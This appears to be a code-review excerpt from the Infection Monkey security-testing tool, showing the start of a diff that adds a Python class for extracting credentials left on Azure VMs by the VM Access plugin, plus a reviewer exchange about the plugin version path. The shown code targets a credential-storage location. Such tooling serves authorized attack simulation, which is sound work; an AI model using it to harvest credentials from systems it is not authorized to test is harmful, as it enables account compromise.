infection_monkey/system_info/azure_cred_collector.py

```diff
@@ -0,0 +1,104 @@
+import sys
+import logging
+import os.path
+import json
+import glob
+import subprocess
+
+__author__ = 'danielg'
+
+LOG = logging.getLogger(__name__)
+
+
+class AzureCollector(object):
+    """
+    Extract credentials possibly saved on Azure VM instances by the VM Access plugin
+    """
+
+    def __init__(self):
+        if sys.platform.startswith("win"):
+            self.path = "C:\\Packages\\Plugins\\Microsoft.Compute.VmAccessAgent\\2.4.2\\RuntimeSettings"
```

Comment:
Is this the only version which the vuln works on?
Maybe it'll be better to use a wildcard for the version

Reply:
I haven't tested it, so would rather not have other versions included.